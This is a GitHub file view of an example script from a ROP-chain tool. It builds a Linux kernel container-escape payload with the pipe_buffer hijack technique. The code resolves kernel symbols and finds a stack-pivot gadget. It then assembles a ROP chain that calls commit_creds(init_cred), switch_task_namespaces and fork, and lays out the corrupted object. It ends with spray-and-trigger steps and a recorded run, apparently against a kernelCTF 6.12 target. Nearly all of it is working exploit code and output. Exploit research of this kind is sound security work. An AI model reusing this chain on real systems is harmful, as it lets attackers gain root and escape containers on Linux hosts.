-
Notifications
You must be signed in to change notification settings - Fork 22
Expand file tree
/
Copy pathlinux_escape_chain.py
More file actions
291 lines (238 loc) · 9.25 KB
/
linux_escape_chain.py
File metadata and controls
291 lines (238 loc) · 9.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
"""Example: Linux kernel namespace escape via pipe_buffer hijack.
Simulates the popular pipe_buffer exploit technique:
1. Corrupt pipe_buffer.ops to point to a fake pipe_buf_operations vtable
2. When pipe_buf_release() calls ops->release(pipe, buf), RSI = buf
3. Pivot RSP from RSI (the controlled pipe_buffer), preserving the
ops pointer at buf+0x10 since the kernel loads it before our gadget
4. Execute ROP chain embedded in the pipe_buffer object:
commit_creds(init_cred)
find_task_by_vpid(1)
switch_task_namespaces(result, init_nsproxy)
fork()
msleep(1000000000)
pipe_buf_release() decompiles to:
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
struct pipe_buffer *buf)
{
const struct pipe_buf_operations *ops = buf->ops; // load [rsi+0x10]
buf->ops = NULL;
ops->release(pipe, buf); // call [[rsi+0x10]+0x08]
}
struct pipe_buffer layout (x86-64):
+0x00 struct page *page
+0x08 unsigned int offset
+0x0c unsigned int len
+0x10 const struct pipe_buf_operations *ops <-- hijacked
+0x18 unsigned int flags
+0x20 unsigned long private
Usage:
PYTHONPATH=. python3 examples/linux_escape_chain.py /path/to/vmlinux
"""
import struct
import sys
from elftools.elf.elffile import ELFFile
from Exrop import Exrop
# pipe_buffer field offsets (x86-64)
PIPE_BUF_OPS_OFF = 0x10
def resolve_symbols(vmlinux_path, names):
"""Read symbol addresses from the vmlinux ELF .symtab section."""
symbols = {}
with open(vmlinux_path, 'rb') as f:
elf = ELFFile(f)
symtab = elf.get_section_by_name('.symtab')
if symtab is None:
raise ValueError("No .symtab section found in {}".format(vmlinux_path))
needed = set(names)
for sym in symtab.iter_symbols():
if sym.name in needed:
symbols[sym.name] = sym['st_value']
needed.discard(sym.name)
if not needed:
break
missing = set(names) - set(symbols)
if missing:
raise ValueError("Symbols not found: {}".format(', '.join(sorted(missing))))
return symbols
if len(sys.argv) < 2:
print("Usage: {} <vmlinux>".format(sys.argv[0]))
sys.exit(1)
VMLINUX = sys.argv[1]
# Resolve kernel symbols
syms = resolve_symbols(VMLINUX, [
'commit_creds', 'init_cred',
'find_task_by_vpid',
'switch_task_namespaces', 'init_nsproxy',
'__x64_sys_fork',
'msleep',
])
commit_creds = syms['commit_creds']
init_cred = syms['init_cred']
find_task_by_vpid = syms['find_task_by_vpid']
switch_task_namespaces = syms['switch_task_namespaces']
init_nsproxy = syms['init_nsproxy']
x64_sys_fork = syms['__x64_sys_fork']
msleep = syms['msleep']
print("Resolved symbols:")
for name, addr in sorted(syms.items()):
print(" {:<30s} 0x{:x}".format(name, addr))
# Load gadgets
e = Exrop(VMLINUX)
e.find_gadgets(cache=True, kernel_mode=True)
e.clean_only = True
# ============================================================
# Step 1: Find pivot gadget from RSI (pipe_buffer pointer)
# ============================================================
# The kernel dispatches ops->release(pipe, buf) where RSI = buf.
# We need a gadget that sets RSP from RSI so our ROP chain
# (embedded in the pipe_buffer) executes.
#
# The ops pointer at buf+0x10 is loaded by the kernel BEFORE
# calling our gadget, but the JOP search doesn't know that —
# pass it in used_dispatch so JOP chains won't overwrite it.
print("=== Finding pivot from RSI (pipe_buffer) ===\n")
used_dispatch = {PIPE_BUF_OPS_OFF: 0} # reserve buf->ops slot
pivots = e.stack_pivot_reg('rsi', used_dispatch=used_dispatch)
# Filter out indirect pivots — they require an extra pointer dereference
# (rsp = *[reg+off]) which is impractical for heap-sprayed objects since
# we don't know the absolute address to place there.
pivots = [p for p in pivots if p.pivot_type not in ('indirect', 'jop_indirect')]
if not pivots:
print("No pivot found from RSI!")
sys.exit(1)
pivot = pivots[0]
print("Best pivot:")
pivot.dump()
# ============================================================
# Step 2: Build the ROP chain (post-pivot)
# ============================================================
print("\n=== Building escape chain ===\n")
# 1. commit_creds(init_cred)
print("[*] commit_creds(init_cred)")
chain = e.func_call(commit_creds, (init_cred,))
chain.dump()
# 2. find_task_by_vpid(1) — result in rax
print("\n[*] find_task_by_vpid(1)")
chain2 = e.func_call(find_task_by_vpid, (1,))
chain.merge_ropchain(chain2)
chain2.dump()
# 3. switch_task_namespaces(rax, init_nsproxy)
# rax holds the return value from find_task_by_vpid.
# Exrop resolves 'rax' as a register reference, setting rdi=rax, rsi=init_nsproxy.
print("\n[*] switch_task_namespaces(rax, init_nsproxy)")
chain3 = e.func_call(switch_task_namespaces, ('rax', init_nsproxy))
chain.merge_ropchain(chain3)
chain3.dump()
# 4. fork()
print("\n[*] fork()")
chain4 = e.func_call(x64_sys_fork, (0,))
chain.merge_ropchain(chain4)
chain4.dump()
# 5. msleep(1000000000) — sleep in parent while child escapes
print("\n[*] msleep(1000000000)")
chain5 = e.func_call(msleep, (1000000000,))
chain.merge_ropchain(chain5)
chain5.dump()
print("\n=== Full ROP chain ===\n")
chain.dump()
# ============================================================
# Step 3: Build the pipe_buffer object layout
# ============================================================
print("\n=== pipe_buffer object layout ===\n")
PIPE_BUF_SIZE = 0x28 # sizeof(struct pipe_buffer)
OBJ_SIZE = max(0x100, PIPE_BUF_SIZE + len(chain.payload_str()) + 0x40)
payload = pivot.build_payload(chain, obj_size=OBJ_SIZE)
print(payload['description'])
print("Chain offset: 0x{:x}".format(payload['chain_offset']))
print("Total object size: 0x{:x} bytes".format(len(payload['obj_layout'])))
# Hexdump the object layout
obj = payload['obj_layout']
print("\nObject hexdump:")
for off in range(0, len(obj), 8):
qword = struct.unpack_from('<Q', obj, off)[0]
marker = ""
if off == PIPE_BUF_OPS_OFF:
marker = " <-- buf->ops (reserved)"
elif off == payload['chain_offset']:
marker = " <-- ROP chain start"
if 'dispatch_entries' in payload:
for d_off, d_addr in payload['dispatch_entries']:
if off == d_off:
marker = " <-- JOP dispatch"
if qword or marker:
print(" +0x{:04x}: 0x{:016x}{}".format(off, qword, marker))
# Show how to set up the fake ops vtable
# ops->release is at offset 0x08 in pipe_buf_operations
print("\nSetup:")
print(" 1. Spray pipe_buffer objects")
print(" 2. Set buf->ops (+0x{:x}) -> fake_ops_table".format(PIPE_BUF_OPS_OFF))
print(" 3. Set fake_ops->release (+0x08) -> 0x{:x} (pivot gadget)".format(
payload['func_ptr']))
print(" 4. Embed ROP chain at buf+0x{:x}".format(payload['chain_offset']))
print(" 5. Close pipe fd to trigger pipe_buf_release()")
"""
// Output from kernelCTF lts-6.12.51
=== Finding pivot from RSI (pipe_buffer) ===
Best pivot:
Pivot type: offset
Gadget: 0xffffffff815665aa # push rsi ; or byte ptr [rbx + 0x41], bl ; pop rsp ; pop r13 ; pop r14 ; pop rbp ; ret
Source register: rsi
Offset: 0x18
ROP chain starts at [rsi+0x18]
=== Building escape chain ===
[*] commit_creds(init_cred)
$RSP+0x0000 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0008 : 0xffffffff840953a0
$RSP+0x0010 : 0xffffffff811e37d0
[*] find_task_by_vpid(1)
$RSP+0x0000 : 0xffffffff815cd6ad # mov edi, 1 ; mov eax, edi ; ret
$RSP+0x0008 : 0xffffffff811d6c00
[*] switch_task_namespaces(rax, init_nsproxy)
$RSP+0x0000 : 0xffffffff8243485a # push rax ; add eax, ebp ; pop rdi ; ret
$RSP+0x0008 : 0xffffffff8115fbce # pop rsi ; ret
$RSP+0x0010 : 0xffffffff84094e80
$RSP+0x0018 : 0xffffffff811e16d0
[*] fork()
$RSP+0x0000 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0008 : 0x0000000000000000
$RSP+0x0010 : 0xffffffff811a6440
[*] msleep(1000000000)
$RSP+0x0000 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0008 : 0x000000003b9aca00
$RSP+0x0010 : 0xffffffff812732f0
=== Full ROP chain ===
$RSP+0x0000 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0008 : 0xffffffff840953a0
$RSP+0x0010 : 0xffffffff811e37d0
$RSP+0x0018 : 0xffffffff815cd6ad # mov edi, 1 ; mov eax, edi ; ret
$RSP+0x0020 : 0xffffffff811d6c00
$RSP+0x0028 : 0xffffffff8243485a # push rax ; add eax, ebp ; pop rdi ; ret
$RSP+0x0030 : 0xffffffff8115fbce # pop rsi ; ret
$RSP+0x0038 : 0xffffffff84094e80
$RSP+0x0040 : 0xffffffff811e16d0
$RSP+0x0048 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0050 : 0x0000000000000000
$RSP+0x0058 : 0xffffffff811a6440
$RSP+0x0060 : 0xffffffff81177704 # pop rdi ; ret
$RSP+0x0068 : 0x000000003b9aca00
$RSP+0x0070 : 0xffffffff812732f0
=== pipe_buffer object layout ===
Place ROP chain at object+0x18
Chain offset: 0x18
Total object size: 0x100 bytes
Object hexdump:
+0x0010: 0x0000000000000000 <-- buf->ops (reserved)
+0x0018: 0xffffffff81177704 <-- ROP chain start
+0x0020: 0xffffffff840953a0
+0x0028: 0xffffffff811e37d0
+0x0030: 0xffffffff815cd6ad
+0x0038: 0xffffffff811d6c00
+0x0040: 0xffffffff8243485a
+0x0048: 0xffffffff8115fbce
+0x0050: 0xffffffff84094e80
+0x0058: 0xffffffff811e16d0
+0x0060: 0xffffffff81177704
+0x0070: 0xffffffff811a6440
+0x0078: 0xffffffff81177704
+0x0080: 0x000000003b9aca00
+0x0088: 0xffffffff812732f0
"""